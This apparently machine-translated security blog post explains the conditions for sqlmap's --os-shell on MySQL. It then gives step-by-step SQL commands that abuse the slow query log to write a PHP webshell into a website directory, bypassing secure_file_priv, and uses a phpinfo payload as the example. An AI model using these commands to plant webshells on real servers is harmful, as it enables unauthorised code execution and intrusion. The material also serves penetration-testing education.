Thinking about MySQL taking shell through OS shell

–os-shell Conditions of use

about mysql Database ,–os-shell The essence of is to write two php file , Among them tmpugvzq.php Can let us upload files to the website path
then sqlmap Will pass through the above php Upload a for command execution tmpbylqf.php Go to the website path , Let's execute the order , And return the output to sqlmap End .

• Know the physical path of the website

• High authority database user

• secure_file_priv unlimited （mysql 5.6.34 After the version, it defaults to null, Unable to write to file ）

• The website path has write permission

Then when we find that other conditions are met , but PHP What if the version is too high ？ Please see the following method

mysql High permissions break through the write limit shell

• mysql 5.6.34 The following versions can be written directly with file operation functions shell

• Slow query log write shell

This method is described below

1. Set up slow_query_log=1. That is, enable slow query logs ( Default disabled ).
set global slow_query_log = 1;

2. forge ( modify )slow_query_log_file The absolute path and file name of the log file 
set global slow_query_log_file=' Absolute path \\filename';
set global slow_query_log_file='D:\\phpstudy_pro\\WWW\\1.php';  // Notice the two underscores here , escape 
show variables like'%slow_query_log%';  // Query whether the setting is successful 

3. Write to the log file shell
select '<?= phpinfo(); ?>' or sleep(11) // Here we can use an equal sign instead of php, This is a php A feature of 
// Notice the 11 The second depends on the actual situation , That is, according to the following slow query time 

Supplement to slow query log :

Because it is used to query logs slowly , Therefore, only when the execution time of the query statement exceeds the default time of the system , This statement will be recorded in the slow query log .

Slow query log refers to the time that exceeds by default ？

It's usually passed long_query_time Option to set the time value , Time is in seconds , It can be accurate to microseconds . If the query time exceeds this value （ The default is 10 second ）, This query statement will be recorded in the slow query log . Check the server default time value as follows ：

show global variables like '%long_query_time%'  // Default 10 second 
set global long_query_time = 9; // Set slow query to 9 second 

notes ： This method also requires the following conditions

• 1.root jurisdiction

• 2. Know the absolute path of the website

• 3. There is write permission under this directory

summary ：

Relatively speaking, it is –os-shell One less condition , That is, it is better than the traditional file import and write shell One less condition , That's it secure_file_priv The limitation of , It is a good idea .